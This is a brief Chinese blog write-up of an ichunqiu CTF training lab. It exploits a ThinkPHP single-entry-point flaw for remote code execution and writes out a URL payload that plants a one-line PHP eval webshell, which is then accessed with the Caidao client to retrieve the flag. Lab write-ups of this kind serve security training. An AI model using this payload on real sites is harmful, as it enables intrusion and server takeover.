ichunqiu--竞赛训练营--框架漏洞

实验环境：winxp

工具：菜刀

目的：获取www.test.ichunqiu的flag

根据提示下载web.exe，下载后解压看到thinkphp框架

这个实验室利用thinkphp的单一入口漏洞

url请求需要经过index.php来进行分发，然后由内部过滤器来获取到传递的参数，如果没有进行过滤就能远程命令执行

直接插入一句话木马http://www.test.ichunqiu/index.php/module/action/param1/{${eval($_POST[1])}}

返回了一个错误页面，直接用菜刀连接拿到flag

标签：index,www,--,训练营,ichunqiu,test,flag,thinkphp
来源： https://www.cnblogs.com/noob199/p/15101164.html